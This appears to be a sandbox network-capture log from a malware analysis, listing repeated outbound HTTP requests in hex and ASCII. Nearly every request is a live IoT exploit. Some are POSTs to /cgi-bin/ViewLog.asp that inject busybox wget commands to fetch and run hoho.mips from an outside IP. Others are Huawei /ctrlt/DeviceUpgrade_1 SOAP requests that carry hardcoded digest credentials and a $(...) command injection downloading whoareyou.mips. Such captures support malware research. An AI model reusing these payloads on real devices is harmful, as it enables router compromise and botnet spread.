                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:00.870546103 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:03.366556883 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:08.230668068 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:17.702491045 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:37.926457882 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:16.838498116 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              202192.168.2.134507094.121.146.1268080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:58.725778103 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              203192.168.2.135477231.136.181.1568080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:58.849101067 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:59.430645943 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:00.550698996 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:02.854574919 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:07.462706089 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:16.422527075 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:35.878467083 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:12.742415905 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              204192.168.2.135931062.31.226.1308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:58.932857037 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:59.146509886 CET207INHTTP/1.0 401 Not Authorized
                                              WWW-Authenticate: Basic realm="Your friendly DynDNS server"
                                              Content-Type: text/plain
                                              Data Raw: 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 72 65 71 75 69 72 65 64
                                              Data Ascii: Authentication required


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              205192.168.2.135957894.122.214.1088080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:58.956996918 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              206192.168.2.135202894.238.154.398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:59.684134960 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              207192.168.2.134665431.193.176.678080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:59.684237003 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              208192.168.2.1350806156.241.94.21237215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:00.277540922 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:02.246624947 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:04.646733046 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
